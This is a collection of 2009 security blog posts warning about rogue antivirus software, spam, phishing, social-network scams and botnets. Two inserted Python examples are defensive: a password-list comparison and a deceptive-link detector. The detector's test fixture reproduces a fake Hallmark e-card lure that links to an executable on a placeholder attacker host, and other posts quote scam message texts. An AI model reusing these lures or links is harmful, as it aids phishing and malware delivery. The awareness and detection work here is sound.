Thursday, December 31, 2009

Safe Computing Tips For All

Jerome Segura, a Security Analyst at ParetoLogic of Victoria, B.C., Canada, just posted a nice piece on computer security practices with a different perspective in his “Malware Diaries” Blog.

He begins his list of security tips by considering four classes of users:
  1. the pre-baby boomers: These folks rarely touched a computer in their lives and if they did, kudos!
    Typical use: Work, Solitaire, Printing stuff.
  2. the early and late baby boomers: They have been interacting with computers pre-Internet and have good notions but lack the ‘modern day stuff’.
    Typical use: Work, e-mail, Online searches.
  3. the 70’s – 80’s users: These guys are definitely into computers, maybe a bit more gaming and such. They possess quite a good sense of computing.
    Typical use: Games, Work, E-mail, Online Dating, Forums
  4. 90’s to present: Some of them were born with a computer or handheld device. Their lives would not be possible without the MSN, Skype and more recently all the social engineering glitter.
    Typical use: Twittering, Facebooking, Online shopping.
He then makes further distinctions by level of security knowledge and awareness:
  • extra-cautious (paranoiacs)
  • those who somewhat understand
  • those who are over-confident
  • security conscious folks.
His “ABCs of online security” is a list of 11 practices that could create a sound security consciousness for everyone, but especially for all those non-technical home users out there.

“- Today’s computers are connected to the Internet and are therefore much more at risk than their ancestors.

“- The Internet is fun but also dangerous.

“- People don’t know what they do and can easily be duped.

“- The more cool stuff, the more risks.

“- The right choice of software and hardware can protect your computer but will not make it 100 percent safe.

“- Updates should be applied religiously.

“- If you aren’t sure about something, check it. Files and Websites can be analyzed prior to opening.

“- Computers are not demons but they can be zombies.

“- Browsing to a site (ANY site) can infect your computer.

“- Backups are your best friends.

“- Virtual Machines are an acceptable way to have an affair (and get infected) behind your computer’s back.” (I think he means “an acceptable way to experiment with potentially malicious sites and files.”)

There’s always been a tendency among the technoroti to look down their noses at non-technical users. Personally I don’t think there has been enough effort put into public education on computer security. It’s way too common to blame the victims and that just doesn’t work. The money they spend for rogue anti-malware products and the cash siphoned out of their bank accounts help fund the criminal groups that prey on all of us.

When it comes to computer security, we’re all in this together.

The U.S. Computer Emergency Readiness Team (US-CERT) has a great page of security documents for all levels of users: http://www.us-cert.gov/cas/tips/

Wednesday, December 30, 2009

What do you see?

I recently had an interesting message arrive in my system; after viewing the message, 100% of those polled agreed on what it was. What do you think?


What do YOU see?

If you answered spam, you’re on your way to having the mentality of a spam analyst.

This message has many hallmarks of classic unsolicited commercial email:
  1. the middle of the message says “Click Here” in big prominent text
  2. there’s an “opt-out” banner, announcing that this is an ad
  3. the ad contains a “unique ID”
  4. despite the (intentionally obscured) address, the message does not say who it is actually from
  5. the “call to action” link is http :/fefcbdacggbfg.[redacted].info/alphaville/4754-1b416/ — random sub-domain, published in the .info top level domain, with a directory name comprised of two random words, and a sub-directory that looks like yet another unique identifier.
  6. everything in this message except for the “unique ID” under the opt-out banner is actually an image.
Those of you who are actually interested in psychology will also note that the inkblot is not actually part of either the Rorschach or the Holtzman Inkblot Test. It seems to me that this message is designed to take advantage of those who are willing to try anything to get a job. In the long run, an accredited educational institution will likely be much more beneficial.

Tuesday, December 29, 2009

AntivirusPC2009

Is this the last rogue for 2009? The cyber criminals will probably ditch 2009 in their naming after the New Year. AntivirusPC2009 may still trick some people before next year, though. The fraud tool downloads files onto the system and then "detects" them after a scan has been performed.




Not-so funny jokes

Activities associated with Koobface have increased during the month of December. Often the activity involves sending traffic to compromised servers in order to obtain more servers. Other times it centers around using those same compromised servers to proxy users to malicious domains that are then used for further distribution of malware or for command and control of the infected machines.

SystemCleanerPRO

SystemCleanerPRO is a rogue antivirus program, or a complete scam. SystemCleanerPRO uses fake security alerts and fictitious system pop-ups that warn of infections to frighten users into buying the software. SystemCleanerPRO is a complete rip-off and should be removed from infected PCs immediately.



If SystemCleanerPRO has infected your computer, you may experience the following symptoms:

  • Slow sluggish PC
  • SystemCleanerPRO running a system scan every time you turn your PC on
  • System alerts warning you that the computer is under attack or is not protected, recommending you purchase SystemCleanerPro
  • Web browser redirecting to random websites (which are owned by the crooks who author this and other malicious software)
  • Other programs not opening or shutting down
If your Windows PC is infected with this kind of malware, Click Here to learn how to remove it.

Twitter banned passwords

As you may have heard in the last few days, Twitter has banned 370 passwords (actually only 369, ‘password’ appears twice in the list) as ‘too obvious’ to be safe for their users. A good move in theory but why are so few words banned? And what are they? The list is available in various places online, or even just by viewing the source of the Twitter sign up page. Sadly the sports fans in this Sophos office may be out of luck with both ‘boston’ and ‘redsox’ making the banned list.



Fans of football, basketball or hockey are luckier though, no mention of ‘patriots’, ‘celtics’ or ‘bruins’, all of which are allowed but, quite correctly, flagged as weak.



It’s not clear yet where the folks at Twitter got their list of banned passwords from, but it occurred to me that it might be interesting to compare it to another list of common passwords, this time a list that the bad guys are using: the 246 passwords used by Conficker. The lists have only 29 passwords in common, with another 100 of the Conficker list shorter than Twitter’s 6 character limit. That leaves 117 passwords that malware authors think are common but apparently Twitter does not.

Ideally Twitter would have a better system to discourage users from choosing poor passwords than a simple, and short, blacklist, but to their credit they do give passwords a security rating. Their rating system for passwords that they do allow ranks passwords into 4 levels from ‘weak’ through ‘good’ and ‘strong’ to ‘very strong’. My advice is to make sure that your password is rated as Very Strong. You’ll need a long password or a combination of upper and lower case letters, numbers and special characters. If you need some help thinking up a very strong password that you can remember, take a look Here.
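The two ideas in this post, comparing a site's blacklist against an attacker's word list and rating the passwords that survive, as an added example that is not code from the post or from Twitter. The word lists are short constructed samples, the minimum length is the 6 characters the post mentions, and the four-level scoring formula is an assumption (Twitter's own formula is not published).

```python
import string

# Constructed sample lists for illustration only; the real Twitter and
# Conficker lists are far longer (370 and 246 entries per the post).
TWITTER_BANNED = {"password", "123456", "qwerty", "letmein",
                  "boston", "redsox", "abc123", "monkey"}
CONFICKER_LIST = {"password", "123456", "admin", "root", "1234",
                  "test", "qwerty", "pass", "server", "letmein"}
MIN_LENGTH = 6  # Twitter's 6 character limit mentioned in the post


def compare_lists(banned, attacker_list, min_length=MIN_LENGTH):
    """Split an attacker word list three ways: entries the site already
    bans, entries too short to be accepted anyway, and the remainder the
    site still allows. Same breakdown as the 29 / 100 / 117 in the post."""
    common = attacker_list & banned
    too_short = {p for p in attacker_list - common if len(p) < min_length}
    remaining = attacker_list - common - too_short
    return common, too_short, remaining


def rate_password(pw, banned=TWITTER_BANNED, min_length=MIN_LENGTH):
    """Return 'banned' or one of the four levels the post names.
    Assumed scoring (not Twitter's): one point each for length >= 8,
    mixed case, a digit and a special character, plus one for length >= 12;
    0-1 points is weak, 2 good, 3 strong, 4-5 very strong."""
    if pw.lower() in banned or len(pw) < min_length:
        return "banned"
    score = 0
    if len(pw) >= 8:
        score += 1
    if len(pw) >= 12:
        score += 1
    if any(c.islower() for c in pw) and any(c.isupper() for c in pw):
        score += 1
    if any(c.isdigit() for c in pw):
        score += 1
    if any(c in string.punctuation for c in pw):
        score += 1
    levels = ["weak", "weak", "good", "strong", "very strong", "very strong"]
    return levels[score]


if __name__ == "__main__":
    common, short, rest = compare_lists(TWITTER_BANNED, CONFICKER_LIST)
    print(f"banned already: {len(common)}, too short: {len(short)}, still allowed: {len(rest)}")
    for candidate in ("bruins", "redsox", "Boston2009", "Tr0ub4dor&3"):
        print(candidate, "->", rate_password(candidate))
```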

Facebook and Twitter Security - And How to Stay Safe!

Hopefully, the holiday season has found you spending a good amount of time offline: enjoying moments spent with friends and family, keeping long-standing traditions or creating new ones to follow for seasons to come, or just relaxing due to some downtime from work or school.

It wouldn’t come as much of a surprise, though, if you’ve still found yourself spending a fair share of your time during the holidays online: checking status updates and posting new pictures on Facebook, or sending and checking tweets on Twitter. And, why not? These networking sites are an easy way to connect and share with the people we care about.

But, there is a downside: popular networking sites continually take heat for privacy concerns, and are also crawling with criminal behavior. CNET News, in a recent article it ran on security issues on Facebook and Twitter, cites two industry reports that illustrate this:
  • Per a recent Sophos study, Facebook users are quick to reveal sensitive private information to people they don’t know, with 40% of Facebook users ‘blindly accepting’ friend requests from strangers and allowing access to personal information, like their date of birth, physical address, e-mail address, and phone number.
  • According to Kaspersky, of the nearly 500,000 new URLs that are tweeted daily on Twitter, between 100 and 1,000 are malware attacks.
The CNET News article, “Using Facebook and Twitter Safely”, goes on to give a thorough roundup of some of the most common security and privacy issues users are faced with. It not only takes you through what the specific threats are, but more importantly, it explains what you can do about them. Take a look at the full article to learn more about solutions you can put to use today to stay safe.

And, I hope that you’re enjoying the holidays, and that you're staying safe and secure - both online and offline!

Antispyware Shield Pro

Antispyware Shield Pro is phony security software, also known as a rogue. Antispyware Shield Pro uses fake security warnings and pop-up alerts to frighten people into thinking their PC is infected. Antispyware Shield Pro will not remove these supposed infections until you purchase the software. Do not fall for this scam; Antispyware Shield Pro is an infection itself.



If your Windows PC is infected with this kind of malware, Click Here to learn how to remove it.

Total PC Defender

Total PC Defender is a rogue security software, a complete scam designed to rip people off. If Total PC Defender has infected your PC, you should remove it immediately.



If your Windows PC is infected with this kind of malware, Click Here to learn how to remove it.

Researchers take down Mega-D, one of top 10 botnets

Atif Mushtaq, a researcher at the security company FireEye, has coordinated a global effort to take down one of the top 10 botnets – Mega-D.

PC World said the botnet controlled 250,000 machines in a massive network that was responsible for nearly 12 percent of world spam, according to MessageLabs statistics.

Mushtaq and those working with him coordinated their efforts with Internet service providers to isolate the Mega-D command-and-control servers in Israel, Turkey and the U.S.

The researchers shared their information with U.S. federal law-enforcement agencies and said the federal agencies should begin similar research and takedowns on a full-time basis.

Story here.

“Top 10 botnets and their impact” (December 9)

Friday, December 25, 2009

A Christmas greeting from Koobface

Security researchers examining the directories of the URLs of some of the latest Koobface runs may stumble upon a Christmas greeting:

Are you caring for your Mom and Dad at Xmas?

For those of you that are having to put up with looking after your parents over Christmas: Would you much rather selfishly indulge yourselves with partying? A kindly spammer has a very seasonal Christmas Eve message offering to make this the last year that you will have to “put up” with the burdens of family elders.

But be careful that your own children don’t read this.

Free Help Finding Senior Care for Mom or Dad
Do you have an aging parent or loved one? Do you sometimes worry about their living situation? Finding the right elder care option for your loved one can be an overwhelming and difficult process.
Fortunately, there is a simple way to find an elder care solution for your loved one! A is a FREE elder care referral service assisting families in finding resources of every kind.
We can quickly help you find the following options:
  • Assisted Living Communities 
  • Nursing Homes
  • Retirement Communities
  • Alzheimer’s Care Communities
  • Residential Care Homes
  • Home Care Services
  • Other Elder Care Services
Beginning your search with is easy - click here to get started now!
Warm regards,
Technically this may be a legitimate emailing within the U.S.A. under the CAN-SPAM legislation. But it certainly does not seem to be quite in the spirit of Christmas.

APCProtect

APCProtect is a phony security program, designed to rip people off. APCProtect uses scare tactics, including false security warnings and fabricated system scan results, to frighten people into purchasing it. If APCProtect is installed on your computer, you should remove it immediately.



If your computer is infected with this malware, you must remove it soon. Click Here to learn how to remove it.

Merry CHRISTMA EXEC

Once again, we'd like to wish our readers Merry Christmas with a reference to the 1986 CHRISTMA EXEC worm.



Here's a link to January 1987 Risks Digest, discussing the worm.

And here's a link to the original source code for this worm. Normally we wouldn't link to malware code, but hey, it's 23 years old.

Thursday, December 24, 2009

AV-Comparatives Summary Reports 2009 Available!

Summary Report 2009

AV-Comparatives Site: http://www.av-comparatives.org/
Read/Download Summary Here.

Overall winners of 2009 (Best Products of the Year by AV-Comparatives):


To be rated “Best Anti-Virus Product of 2009” by AV-Comparatives, an Anti-Virus product should preferably have very high detection rates (of malware and also potentially unwanted applications), high proactive on-demand detection (or provide proactive protection), very few false positives (FP), scan fast and reliably with a low system impact, provide good malware removal capabilities, protect the system against malware/websites with malicious software without relying too much on user decisions/interactions, cause no crashes or hangs, and have no annoying bugs.
Based on the awards given by AV-Comparatives during 2009, several products got many high awards and are very close, so that we decided to award not only the Best Product of 2009 but also the second and third places (Silver and Bronze). Looking into the detail of the raw results, we decided to give the following awards:

  1. GOLD: Symantec (Best Product of 2009) 
  2. SILVER: Kaspersky 
  3. BRONZE: ESET

Wednesday, December 23, 2009

All about Brittany on Twitter

It's the usual situation, with the bad guys exploiting the death of a famous person, just like they did with Michael Jackson.

Yesterday we identified some Twitter accounts that are being used both to send "make money on the Internet" spam, and also to spread links to malware. In both cases, they used Brittany Murphy's name.

Here's a couple of examples:




Latest AV-Comparatives test Available (Performance comparative)

Performance comparative test result is available!

AV-Comparatives: http://www.av-comparatives.org/
Read/Download test result from Here.

Tuesday, December 22, 2009

NFA: Beware the '12 scams of Christmas'

This is the '12 scams of Christmas' I mentioned in my last post:

Pipers tout fake gold rings as Maids are 'a-phishing' to milk bank accounts

On what is traditionally the busiest online shopping day of the year (1), consumers are being warned not to become victims of the '12 Scams of Christmas' and to take extra care with personal and IT security.

The '12 Scams of Christmas' developed by the National Fraud Authority (NFA), The UK Cards Association and the City of London Police (CoLP) highlight the greatest holiday fraud threats and how to spot them.
  1. Shopping and online auction fraud (counterfeit goods and websites)
  2. Credit and debit card fraud (including cash machine fraud)
  3. Scam ticket websites
  4. Lottery, prize draw and sweepstake scams
  5. Identity fraud and theft
  6. Phishing emails
  7. Scam letters (usually from West Africa or Eastern Europe)
  8. Loan scams
  9. Premium phone line scams
  10. High value item scams (shares, gemstones and fine wine)
  11. Rogue doorstep sellers
  12. Slimming and miracle cures.
With just 18 shopping days left and new research suggesting over 90% of people plan to purchase Christmas gifts online this year (1) opportunistic fraudsters are busy 'phishing' for their next victims. However, the threat is not only on the web, the high streets are also a 'fraudster's paradise'.

Criminals take advantage of those distracted by Christmas festivities: ATM users and revellers hitting bars and pubs are prime targets for 'shoulder surfers' and 'card cloners'. Those undertaking last minute home repairs fall foul of bogus traders, while people purchasing tickets for special events or dieting during the holidays, are also on the 'fraudster's Christmas shopping list'.

The National Fraud Authority (NFA), the Government's strategic lead organisation on counter-fraud activity, is working to increase fraud awareness during this holiday period and has published '12 simple tips' to help combat fraud this Christmas.

CEO of the NFA Dr Bernard Herdan said: "One of the greatest barriers we have in educating people about fraud is the stigma associated with it. Fraud is not a victimless crime. In some cases it destroys lives. Listen to the warnings. Be aware. Once you are defrauded, your personal details can end up on a 'suckers list'. They can then be traded on the internet. So it may not be a Happy New Year for you!

"Some simple ground rules are to always consider your card details as cash. In the hands of criminals it makes no difference, and remember, if it sounds too good to be true, it probably is."

Attorney General, Baroness Scotland QC, who oversees the NFA said: "Fraudsters don't take Christmas off. They use the holidays to develop new ways to steal. Counter-fraud agencies have issued this warning to protect us all, and it's important we act on their simple, straightforward advice. If people don't, they could well pay the price. Give yourself a present - be safe this Christmas."

The UK Cards Association has recently launched its 2009 'Be Card Smart Online' campaign website to help consumers minimise their chances of being a victim of card fraud online.

Head of Fraud Control at The UK Cards Association Katy Worobec said: "More than 32 million of us now shop online, and we all need to work together in the fight against fraud. Consumers can play their part by regularly updating their computer's anti-virus systems, looking for the padlock on sites when online and registering with card protection initiatives such as Verified by Visa and MasterCard SecureCode. Top tips can be found in our Don't Reward Fraud booklet at www.financialfraudaction.org.uk."

City of London Police, the Lead Force on Fraud, is taking the opportunity to remind people to protect their PIN number when using ATMs or when paying by credit or debit card in restaurants, bars and clubs over Christmas. Its warning comes as part of an ongoing operation to combat 'shoulder surfers' who note personal identity numbers (PINs), steal wallets and hand bags and then empty bank accounts before the victim realises.

Detective Superintendent from the City of London Police, Bob Wishart, said: "Criminals involved in this 'shoulder surfing' target busy bars where it is easier to operate undetected.

"We are making arrests to stop those involved. However, we know this problem is widespread and that thieves will be looking to take advantage of the Christmas season, as the bars and clubs get busier.

"People should take simple measures: make sure you always cover your PIN number, and keep your wallet or purse safe. I can assure you that criminals are patient. They will wait for the opportune time to steal your wallet or handbag. It only takes a second."

(1) IMRG tracks online sales using the Capgemini index. It surveyed 2,804 people about shopping habits in the run up to Christmas 2009 (e-Customer Service Index).

The 12 scams of Christmas

Tanya has just posted over on Kaspersky Russian site about losses caused by Internet fraudsters in England and Wales. If you want to practice your Russian, hop over there, and take a look!

I know that most people in the UK prefer to get their news in English. So here's a few facts and figures:

In a recent statement, the Office of Fair Trading estimated that losses caused by Internet fraud amounted to £14 billion per year. That's a lot of money! It's also a lot of victims!

The OFT statement quotes research carried out by the University of Portsmouth, commissioned by ACPO (Association of Chief Police Officers) and the NFA (National Fraud Authority):
  • 70,000 people fell victim to a single Nigerian e-mail scam 
  • 38,000 people a year fall victim to fake prize draws 
  • 10,000 people a year fall victim to investments scams
  • 14,000 people a year fall victim to fake lotteries
The report indicates that many people are reluctant to report fraud of this kind - because they're ashamed, embarrassed, angry or simply confused.

The first thing to remember is that you should be very, very wary of 'get-rich-quick' schemes: if something looks too good to be true, it almost certainly is! Please don't hand over money to complete strangers, and avoid disclosing any personal information unless you know exactly who you're dealing with. The NFA gives a helpful list of the '12 scams of Christmas', so if you're in any doubt, check this list out.

If you do fall victim to an Internet scam, please do report it - you can do that here. Nobody's going to judge you - on the contrary, the more reports are made, the better we can quantify the threat! Remember, we can't begin to really manage the problem of Internet fraud and cybercrime unless we can measure it effectively.

Crime time

Crime traditionally increases during the holiday season, and cybercrime is no different. The malware writers, spammers and scammers are out in force. They've recently hit "Odnoklassniki" with this message:


"Hi! I've got a New year surprise for you [emoticon] send 2133 279 (must be with a space) to 4460 and you'll be pleasantly surprised! If you don't take a look, I'll be very grouchy with you [emoticon]"

This message is clearly designed to make the bad guys a bit of holiday cash: an SMS sent to the number given in the message costs between $5 and $12, depending on the mobile service provider.

With similar messages going out on other social networks like VKontakte, Facebook and MySpace, the scammers could do nicely out of this one. And because the messages might come from friends or contacts who've had their accounts hijacked, it's easy to be fooled.

Enjoy the holidays, enjoy spending time with your family and friends, and enjoy the Internet – just be careful and keep safe!

US Chief of CyberSecurity

After months of negotiations, US President Barack Obama has finally chosen a Chief of CyberSecurity - Mr Howard A Schmidt. Confirmation of the appointment is expected shortly.

Mr Schmidt, who previously served with the Bush administration as a cyber security official, comes to the job with an impressively lengthy list of credentials.

The new Chief will essentially be the administration's go-to man for any coordinated efforts to deal with cyber threats and will be reporting to the National Security Council.

After a fairly eventful year of cyber attacks and the related media frenzy, it's nice to see someone finally willing to take up the challenge of dealing with it all. It also promises an interesting 2010.

Best of luck to the new Cyber Czar.

More details in The New York Times article.

Facebook: money mule or credit card

I was just looking at Facebook to check for spam and scams when I found this:




I've blurred out a few things for privacy, and, most crucially, safety. The point of this post is the domain name. The spaces around the dot and the zero in "C0M" are just as they were in the original spam message. If spammers are going to the trouble to obfuscate their messages, it seems to show that Facebook's spam filters are having some effect. Malformed links mean that you have to make a serious effort to actually go and visit the spammer site. And consequently, if someone's going to go through all that trouble, they're more likely to buy into whatever scam is at the other end.

Check Your Friends! Facebook IMs May Lead To Trouble

I ran into a few strange IMs over the weekend. When I was not shoveling out my driveway from the 15 inches of snow that covered it I was logged into Facebook telling people about it…. It was then that I started receiving some VERY interesting IMs from a friend extolling the virtues of a clean colon (yep – you read that right):




Brittany Murphy SEO

Just a quick note - the sudden death of Hollywood celebrity Brittany Murphy last Sunday (BBC report here) has prompted a spike in searches on the subject - and of course, an SEO attack.

Users who click on a poisoned search result link will be redirected to a website that will display a scare message trying to panic users into downloading rogue AV software:

Screenshots of the rogue AV:





Absolutely bog standard SEO attack - but still worth a warning to those who might be looking for more news on the event.

Christmas Bo(g)us

Well, it didn’t take long for the Christmas E-Card scams to start.

Recently we have seen email messages pretending to be from Hallmark, suggesting that you have received an E-card from a friend. The complete email message looks like this:

You have recieved a Hallmark E-Card from your friend.
To see it, check the link below:
http://www.hallmark.com/webapp/wcs/stores/Occasion/ChristmasE-Cards
There’s something special about that E-Card feeling. We invite you to make a friend’s day and send one.
Hope to see you soon, Your friends at Hallmark

Note that the link looks like it’s from Hallmark, but it’s fake. If you hover your mouse over the link and look at your browser’s status bar, the real link shows up (which in this case is http://www..com/_themes/Christmas.exe). This piece of malware is detected by us as Troj/VBInject-S.
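The hover check described above, done programmatically over an HTML mail body, as an added example that is not code from the post: it flags anchors whose visible text is a URL on one host while the href points at another, and hrefs that fetch an executable. The sample message is constructed to mirror the e-card lure, with the placeholder host malicious.example standing in for the address the post redacts.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample mimicking the lure in the post; host is a placeholder.
SAMPLE_EMAIL = """<p>You have recieved a Hallmark E-Card from your friend.</p>
<p>To see it, check the link below:<br>
<a href="http://malicious.example/_themes/Christmas.exe">http://www.hallmark.com/webapp/wcs/stores/Occasion/ChristmasE-Cards</a></p>
<p>Hope to see you soon, <a href="http://www.hallmark.com/">www.hallmark.com</a></p>"""

URL_LIKE = re.compile(r"^(https?://)?[\w.-]+\.[a-z]{2,}(/|$)", re.I)
EXECUTABLE_SUFFIXES = (".exe", ".scr", ".pif", ".bat", ".cmd")


class LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element in the body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    """Hostname of a URL; scheme-less text like www.example.com is accepted."""
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def deceptive_links(html):
    """Return a list of {text, href, reasons} for links worth flagging.
    A link is flagged when its visible text is a URL whose host differs from
    the href host, or when the href path ends in an executable extension."""
    collector = LinkCollector()
    collector.feed(html)
    findings = []
    for href, text in collector.links:
        reasons = []
        if URL_LIKE.match(text) and host_of(text) != host_of(href):
            reasons.append("host mismatch")
        if urlparse(href).path.lower().endswith(EXECUTABLE_SUFFIXES):
            reasons.append("executable download")
        if reasons:
            findings.append({"text": text, "href": href, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in deceptive_links(SAMPLE_EMAIL):
        print(finding)
```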

Just something else to look out for during the silly season.

ProtectPCs

ProtectPC's is a nasty rogue antivirus program, or phony security software, used to scam people out of their money. If your PC is infected with ProtectPC's, you should remove it immediately.



ProtectPC's poses a serious security risk for all PC users. Symptoms of a ProtectPC's infection can include:

  • Web Browser redirecting spontaneously
  • System scans that result in reports showing multiple infections
  • Pop-Ups and system alerts stating the PC is infected
  • Programs being shut down or unable to open
Click Here to learn how to remove this kind of malware.

Malware Defense

Malware Defense is a rogue security program, designed to look like legitimate security software. If Malware Defense has been installed on your PC more than likely you did not intentionally download it, it just appeared one day.



Malware Defense usually infects a computer system with help from malicious advertising or a trojan found on a shady website, without the user's permission. Malware Defense is a scam; do not buy this software, and remove it from infected computers immediately.

Click Here to learn how to remove this kind of malware.

Sunday, December 20, 2009

Last minute shopping - keep safe!

The holidays are nearly here! If you're still searching for the final perfect present, and are thinking of buying online, here's a few practical tips to help keep your last-minute purchases secure:

1. Keep your Internet Security solution updated, not just to the day but to the hour! Vendors release frequent updates to make sure you're protected from the very newest malware. Scan your system before you start shopping.

2. Don’t shop from public WiFi networks which aren't secured using WPA2. These networks can be easily hijacked by cybercriminals, and your sensitive financial data could be compromised.

3. Make sure your system is up-to-date! You should make it a habit to download and install updates not just for your operating system but also for third party applications like:
  • Browsers like IE, Firefox, Opera, Safari, Google Chrome or any other you use
  • Adobe system applications. 
  • Media players like RealPlayer, Winamp, etc.
You may use Secunia to scan your computer for dangerous programs.

4. Check that the sites you shop on are secure! A secure online shopping site will have a valid digital certificate, which is used to encrypt and secure your online transaction, and it will show a closed padlock icon at the bottom or the top of your browser.



The address bar should have an ‘https’ string before the page address.



Remember - NEVER shop on a page which doesn’t have ‘https’ in the address bar:



or if the padlock is open or broken, or if you get a warning regarding the digital certificate of the page you’re on!



Wishing you safe online shopping and happy holidays!

System Adware Scanner 2010

System Adware Scanner 2010 is phony security software, made to look and act like legitimate security software. System Adware Scanner 2010 is a potentially very dangerous PC infection that should be removed from infected systems immediately.



System Adware Scanner 2010 usually uses false security warnings and alerts to frighten people into buying the software. System Adware Scanner 2010 will run system scans and report numerous infections to the user, all of which are false. System Adware Scanner 2010 will then request payment to remove the supposed infections.

If your PC is infected with System Adware Scanner 2010, you must remove it very soon. Click Here to learn how to get rid of it.

Saturday, December 19, 2009

There's No Such Thing as a Free Movie

Those looking to see the latest 3D blockbuster movie, Avatar, on the cheap will have to take great care in what they search for. We have become aware of at least one site that has been rigged to redirect users to a page that presents the now-familiar "play video/need codec" screen. In an unusual twist, this time it is offering a new ActiveX update rather than the usual codec or Flash player updates.



Data Doctor 2010 will make you sick

Data Doctor 2010 is an encryption trojan distributed via our old "friends" at iframedollars. It encrypts the files on your hard drive very rapidly if you’re unfortunate enough to be victimized by it.

It arrives through drive by downloads from malicious web sites. It’s also packaged with other malware.

1. The victim receives a message that the system is shutting down due to "Unrecognized disk driver command."


The most phished brands of 2009

For almost the entire year 2009, the battle for first place among phishing targets took place between eBay and Chase Bank. Most of the time, Chase Bank was on top of the most phished brands.

In December, the situation changed: now PayPal is the most phished brand (32205 unique URLs), followed at a considerable distance by Chase Bank (25901 unique URLs) and eBay (18738 unique URLs).


Why this change? Most probably it has to do with the fact that a lot of people are using PayPal to pay for Christmas presents.

Be safe during the winter holidays: always type the address of PayPal and other online banks into the browser yourself, and never click on links in emails.

CNNIC changes have effect on spam tactics

As was announced on Dec 11th, CNNIC (China Internet Network Information Center) now requires a “formal paper based application material when making the online application to the registrar.”

The motivation behind this seems more related to cracking down on porn sites, but since .cn domains have been the call-to-action in 35-50% of all spam sent for well over a year, we wondered what effect this policy change might have on the prevalence of this TLD in spam. The graph below shows the percentage of spam messages sent each day that contain a .cn domain (the vast majority are Canadian Pharmacy type spam), alongside the percentage of pharmacy spam messages that contain a link to a free webhosting service (blue). I chose to measure .cn abuse against free webhosting abuse because the same Canadian Pharmacy spam that carried links to .cn domains over the past few months now carries links to a number of free webhosting services instead. The CNNIC changes started to be applied on December 14th.



Three specific free webhosting services seem to currently be the favorite of these specific Canadian Pharmacy spammers, and their growth is illustrated below.



These spammers have not completely moved away from .cn abuse: this morning we started seeing an influx of .cn domains not previously sighted in spam. However, all of these domains were actually registered well before the new CNNIC requirements were implemented (most registered for 2 years, back in 2008). For example:


example .cn whois

It will be interesting to monitor if these new CNNIC requirements continue to push these spammers elsewhere, or if this is just a minor hiccup while they find ways around the new registration hoops.

Microsoft privacy portal a target of rogue security software

Earlier in 2009, the Microsoft privacy homepage became the target of rogue security software developers looking to make a fast buck. The developers of the rogue security application known as “Privacy Center” even went so far as to include a link to Microsoft to trick users into thinking the rogue is a Microsoft product. Trojan:Win32/PrivacyCenter is a family of programs that claims to scan for malware and displays fake warnings of “malicious programs and viruses”. They then inform the user that they need to pay money to register the software in order to remove these non-existent threats.

We have received reports that this trojan has been distributed via poisoned search results, where users are redirected to sites that display fake scanners. These pages falsely report that the user's system is infected in order to convince users to download Trojan:Win32/PrivacyCenter. We have also received reports that this trojan has been distributed masquerading as a fake video codec. The pages and files used in this form of attack are highly variable, and change according to the user's location, browser and operating system. Below is a screenshot of the rogue program:



Reports of rogue security programs have been more prevalent as of late. These are programs that generate misleading alerts and false detections in order to convince users to purchase illegitimate security software. Some of these programs may display product names or logos in an apparent and unlawful attempt to impersonate Microsoft products.

To find out how to remove it, Click Here.


Friday, December 18, 2009

Twitter Defaced by Iranian Hacktivists

Twitter, one of the Internet's most popular social networking sites, has been hacked and defaced by a group claiming to be an “Iranian Cyber Army” as of 10:15PM PST today. At this point no statement has been made by Twitter, so it’s unclear what vulnerability was used to exploit the site. Oftentimes hacktivism campaigns are fueled by ego-driven script kiddies who use publicly available exploits, but for now we’ll have to wait and see if Twitter decides to publicly announce the details surrounding the attack.

The defacement has been removed and Twitter is back up and running as of 11:20 PM PST.
Twitter states that the problem was due to compromised DNS. Full investigation pending.

Note: Change your password!

Visiting Twitter.com at 10:15 PM PST tonight rendered the following images and text:

IRANIAN CYBER ARMY
THIS SITE HAS BEEN HACKED BY IRANIAN CYBER ARMY
U.S.A Think They Controlling And managing Internet By Their Access, But They Don’t, We Control And Manage Internet By Our Power, So Do Not Try To Stimulation Iranian Peoples To. NOW WHICH COUNTRY IN EMBARGO LIST? IRAN?USA? WE PUSH THEM IN EMBARGO LIST ;) Take care.




Updates:
  • Story here
  • Twitter blog.
  • a good link to follow updates about this story Here.

FBI: Fraudsters earned $150 million in rogue AV scams


For the first time, the FBI has issued a public warning about the threat of rogue anti-virus software, which the agency said has resulted in more than $150 million in losses to victims.

In an intelligence note posted Friday on the website of the Internet Crime Complaint Center, the FBI said users should be on the lookout for pop-up advertisements masquerading as legitimate-looking AV software, known as "rogueware" or "scareware."

Rogue anti-virus software typically is purveyed through malicious advertisements, or "malvertisements," on trusted websites. When viewed or clicked, the ads lead users to sites that claim their computer is infected and, to resolve the issue, they should buy an anti-virus product, which turns out to be fake. In other instances, the ads try to install trojans onto the victim's PC.

Criminals also have orchestrated the attack by "poisoning" search results, so that when a user searches for a popular term, he or she is led to a website hosting the bogus software.

"The scareware is intimidating to most users and extremely aggressive in its attempt to lure the user into purchasing the rogue software that will allegedly remove the viruses from their computer," the FBI alert said. "Once the pop-up appears, it cannot be easily closed."

The FBI said computers running with administrator privileges are more likely to be infected. In addition, users should always research the names of security software applications to ensure their legitimacy.

A recently released report from the Anti-Phishing Working Group, which analyzed internet fraud trends for the first half of 2009, found that the number of rogue AV programs from January to June surpassed the total for all of 2008. In June, the final month of the study, there were 152,197 new strains.

"The primary reason for the creation of so many variants is to avoid signature-based detection by legitimate anti-virus programs," said Luis Corrons, technical director at PandaLabs and a contributor to the report. "The use of behavioral analysis is of limited use in this type of malware because the programs themselves do not act maliciously on computers, other than displaying false information."

WiniGuard clones are coming thick and fast

Another clone of the WiniGuard family, SysDefence!, went live about 3 hours ago. They're flying off the conveyor belt today.


The GUI is identical to TheDefend except the name.

Spam for the visually impaired

